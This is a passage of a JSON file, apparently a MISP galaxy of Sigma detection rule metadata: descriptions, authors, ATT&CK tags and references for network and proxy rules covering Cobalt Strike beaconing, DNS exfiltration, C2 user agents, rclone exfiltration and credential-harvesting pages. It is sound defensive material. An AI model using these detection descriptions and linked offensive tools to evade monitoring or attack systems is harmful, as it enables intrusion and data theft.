"https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.004" ] }, "related": [ { "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2975af79-28c4-4d2f-a951-9095f229df29", "value": "Cobalt Strike DNS Beaconing" }, { "description": "Detects strings used in command execution in DNS TXT Answer", "meta": { "author": "Markus Neis", "creation_date": "2018-08-08", "falsepositive": [ "Unknown" ], "filename": "net_dns_susp_txt_exec_strings.yml", "level": "high", "logsource.category": "dns", "logsource.product": "No established product", "refs": [ "https://twitter.com/stvemillertime/status/1024707932447854592", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.004" ] }, "related": [ { "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8ae51330-899c-4641-8125-e39f2e07da72", "value": "DNS TXT Answer with Possible Execution Strings" }, { "description": "Detects suspicious DNS queries to Monero mining pools", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-10-24", "falsepositive": [ "Legitimate crypto coin mining" ], "filename": "net_dns_pua_cryptocoin_mining_xmr.yml", "level": "high", "logsource.category": "dns", "logsource.product": "No established product", "refs": [ "https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml" ], "tags": [ "attack.impact", "attack.t1496", "attack.exfiltration", "attack.t1567" ] }, "related": [ { "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b593fd50-7335-4682-a36c-4edcb68e4641", "value": "Monero Crypto Coin Mining Pool Lookup" }, { "description": "Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-06-05", "falsepositive": [ "Legitimate use of Telegram bots in the company" ], "filename": "net_dns_susp_telegram_api.yml", "level": "medium", "logsource.category": "dns", "logsource.product": "No established product", "refs": [ "https://core.telegram.org/bots/faq", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" ], "tags": [ "attack.command-and-control", "attack.t1102.002" ] }, "related": [ { "dest-uuid": "be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c64c5175-5189-431b-a55e-6d9882158251", "value": "Telegram Bot API Request" }, { "description": "Detects suspicious DNS queries using base64 encoding", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-05-10", "falsepositive": [ "Unknown" ], "filename": "net_dns_susp_b64_queries.yml", "level": "medium", "logsource.category": "dns", "logsource.product": "No established product", "refs": [ "https://github.com/krmaxwell/dns-exfiltration", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_b64_queries.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.003", "attack.command-and-control", "attack.t1071.004" ] }, "related": [ { "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4153a907-2451-4e4f-a578-c52bb6881432", "value": "Suspicious DNS Query with B64 Encoded String" }, { "description": "Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.", "meta": { "author": "Tim Brown", "creation_date": "2023-01-09", "falsepositive": [ "Unlikely. Except due to misconfigurations" ], "filename": "juniper_bgp_missing_md5.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "juniper", "refs": [ "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/juniper/bgp/juniper_bgp_missing_md5.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.credential-access", "attack.collection", "attack.t1078", "attack.t1110", "attack.t1557" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a7c0ae48-8df8-42bf-91bd-2ea57e2f9d43", "value": "Juniper BGP Missing MD5" }, { "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\nEnsure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.\n", "meta": { "author": "Alexandr Yampolskyi, SOC Prime, Tim Shelton", "creation_date": "2019-03-26", "falsepositive": [ "Unknown" ], "filename": "net_firewall_cleartext_protocols.yml", "level": "low", "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "d7fb8f0e-bd5f-45c2-b467-19571c490d7e", "value": "Cleartext Protocol Usage" }, { "description": "Detects Baby Shark C2 Framework default communication patterns", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-06-09", "falsepositive": [ "Unlikely" ], "filename": "proxy_hktl_baby_shark_default_agent_url.yml", "level": "critical", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_hktl_baby_shark_default_agent_url.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", "value": "HackTool - BabyShark Agent Default URL Pattern" }, { "description": "Detects WebDav DownloadCradle", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-04-06", "falsepositive": [ "Administrative scripts that download files from the Internet", "Administrative scripts that retrieve certain website contents", "Legitimate WebDAV administration" ], "filename": "proxy_downloadcradle_webdav.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_downloadcradle_webdav.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", "value": "Windows WebDAV User Agent" }, { "description": "Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).", "meta": { "author": "Markus Neis, Florian Roth (Nextron Systems)", "creation_date": "2024-02-15", "falsepositive": [ "Unknown" ], "filename": "proxy_hktl_cobalt_strike_malleable_c2_requests.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", "https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/", "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile", "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile", "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_hktl_cobalt_strike_malleable_c2_requests.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f3f21ce1-cdef-4bfc-8328-ed2e826f5fac", "value": "HackTool - CobaltStrike Malleable Profile Patterns - Proxy" }, { "description": "Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.\n", "meta": { "author": "Ahmed Farouk", "creation_date": "2024-05-10", "falsepositive": [ "Unknown" ], "filename": "proxy_webdav_external_execution.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html", "https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4", "https://www.trendmicro.com/en_no/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html", "https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_webdav_external_execution.yml" ], "tags": [ "attack.initial-access", "attack.t1584", "attack.t1566" ] }, "related": [ { "dest-uuid": "7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ae64f96-72b6-48b3-ad3d-e71dff6c6398", "value": "Suspicious External WebDAV Execution" }, { "description": "Detects user agent and URI paths used by empire agents", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-07-13", "falsepositive": [ "Valid requests with this exact user agent to server scripts of the defined names" ], "filename": "proxy_hktl_empire_ua_uri_patterns.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://github.com/BC-SECURITY/Empire", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_hktl_empire_ua_uri_patterns.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", "value": "HackTool - Empire UserAgent URI Combo" }, { "description": "Detects download of certain file types from hosts in suspicious TLDs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-11-07", "falsepositive": [ "All kinds of software downloads" ], "filename": "proxy_download_susp_tlds_blacklist.yml", "level": "low", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", "https://www.spamhaus.org/statistics/tlds/", "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml" ], "tags": [ "attack.initial-access", "attack.t1566", "attack.execution", "attack.t1203", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", "value": "Download From Suspicious TLD - Blacklist" }, { "description": "Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-07-08", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_frameworks.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_frameworks.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", "value": "Exploit Framework User Agent" }, { "description": "Detects Bitsadmin connections to domains with uncommon TLDs", "meta": { "author": "Florian Roth (Nextron Systems), Tim Shelton", "creation_date": "2019-03-07", "falsepositive": [ "Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca" ], "filename": "proxy_ua_bitsadmin_susp_tld.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://twitter.com/jhencinski/status/1102695118455349248", "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001", "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9eb68894-7476-4cd6-8752-23b51f5883a7", "value": "Bitsadmin to Uncommon TLD" }, { "description": "Detects suspicious malformed user agent strings in proxy logs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-07-08", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_susp.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_susp.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7195a772-4b3f-43a4-a210-6a003d65caa1", "value": "Suspicious User Agent" }, { "description": "Detects suspicious user agent strings used by malware in proxy logs", "meta": { "author": "Florian Roth (Nextron Systems), X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2017-07-08", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_malware.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", "http://www.botopedia.org/search?searchword=scan&searchphrase=all", "https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q", "https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large", "https://twitter.com/crep1x/status/1635034100213112833", "https://perishablepress.com/blacklist/ua-2013.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_malware.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", "value": "Malware User Agent" }, { "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-21", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_cryptominer.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65", "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_cryptominer.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", "value": "Crypto Miner User Agent" }, { "description": "Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.", "meta": { "author": "Florian Roth (Nextron Systems), Brian Ingram (update)", "creation_date": "2022-07-08", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_susp_base64.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://deviceatlas.com/blog/list-of-user-agent-strings#desktop", "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_susp_base64.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", "value": "Potential Base64 Encoded User-Agent" }, { "description": "Detects Windows PowerShell Web Access", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-13", "falsepositive": [ "Administrative scripts that download files from the Internet", "Administrative scripts that retrieve certain website contents" ], "filename": "proxy_ua_powershell.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_powershell.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c8557060-9221-4448-8794-96320e6f3e74", "value": "Windows PowerShell User Agent" }, { "description": "Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string", "meta": { "author": "Janantha Marasinghe", "creation_date": "2022-10-18", "falsepositive": [ "Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations" ], "filename": "proxy_ua_rclone.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", "https://rclone.org/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_rclone.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", "value": "Rclone Activity via Proxy" }, { "description": "Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.", "meta": { "author": "Gavin Knapp", "creation_date": "2023-03-16", "falsepositive": [ "Legitimate use of IPFS being used in the organisation. However the cs-uri regex looking for a user email will likely negate this." ], "filename": "proxy_susp_ipfs_cred_harvest.yml", "level": "low", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://blog.talosintelligence.com/ipfs-abuse/", "https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638", "https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml" ], "tags": [ "attack.credential-access", "attack.t1056" ] }, "related": [ { "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eb6c2004-1cef-427f-8885-9042974e5eb6", "value": "Suspicious Network Communication With IPFS" }, { "description": "Detects executable downloads from suspicious remote systems", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-13", "falsepositive": [ "All kind of software downloads" ], "filename": "proxy_download_susp_tlds_whitelist.yml", "level": "low", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml" ], "tags": [ "attack.initial-access", "attack.t1566", "attack.execution", "attack.t1203", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b5de2919-b74a-4805-91a7-5049accbaefe", "value": "Download From Suspicious TLD - Whitelist" }, { "description": "Detects POST requests to the F5 BIG-IP iControl Rest API \"bash\" endpoint, which allows the execution of commands on the BIG-IP", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Thurein Oo", "creation_date": "2023-11-08", "falsepositive": [ "Legitimate usage of the BIG IP REST API to execute command for administration purposes" ], "filename": "proxy_f5_tm_utility_bash_api_request.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash", "https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029", "https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_f5_tm_utility_bash_api_request.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b59c98c6-95e8-4d65-93ee-f594dfb96b17", "value": "F5 BIG-IP iControl Rest API Command Execution - Proxy" }, { "description": "Detects download of certain file types from hosts with dynamic DNS names (selected list)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-11-08", "falsepositive": [ "Software downloads" ], "filename": "proxy_download_susp_dyndns.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_dyndns.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control", "attack.t1105", "attack.t1568" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7bd9c723-2f78-4309-82c5-47cad406572b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "195c1119-ef07-4909-bb12-e66f5e07bf3c", "value": "Download from Suspicious Dyndns Hosts" }, { "description": "Detect the update check performed by Advanced IP/Port Scanner utilities.", "meta": { "author": "Axel Olsson", "creation_date": "2022-08-14", "falsepositive": [ "Expected if you legitimately use the Advanced IP or Port Scanner utilities in your environement." ], "filename": "proxy_pua_advanced_ip_scanner_update_check.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://www.advanced-port-scanner.com/", "https://www.advanced-ip-scanner.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_pua_advanced_ip_scanner_update_check.yml" ], "tags": [ "attack.discovery", "attack.t1590" ] }, "related": [ { "dest-uuid": "9d48cab2-7929-4812-ad22-f536665f0109", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", "value": "PUA - Advanced IP/Port Scanner Update Check" }, { "description": "Detects suspicious user agent strings used in APT malware in proxy logs", "meta": { "author": "Florian Roth (Nextron Systems), Markus Neis", "creation_date": "2019-11-12", "falsepositive": [ "Old browsers" ], "filename": "proxy_ua_apt.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_apt.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6ec820f2-e963-4801-9127-d8b2dce4d31b", "value": "APT User Agent" }, { "description": "Detects suspicious encoded User-Agent strings, as seen used by some malware.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-04", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_base64_encoded.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://deviceatlas.com/blog/list-of-user-agent-strings#desktop", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_base64_encoded.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d443095b-a221-4957-a2c4-cd1756c9b747", "value": "Suspicious Base64 Encoded User-Agent" }, { "description": "Detects Bitsadmin connections to IP addresses instead of FQDN names", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-10", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_bitsadmin_susp_ip.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://isc.sans.edu/diary/Microsoft+BITS+Used+to+Download+Payloads/21027", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001", "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", "value": "Bitsadmin to Uncommon IP Server Address" }, { "description": "Detects a flashplayer update from an unofficial location", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-10-25", "falsepositive": [ "Unknown flash download locations" ], "filename": "proxy_susp_flash_download_loc.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_susp_flash_download_loc.yml" ], "tags": [ "attack.initial-access", "attack.t1189", "attack.execution", "attack.t1204.002", "attack.defense-evasion", 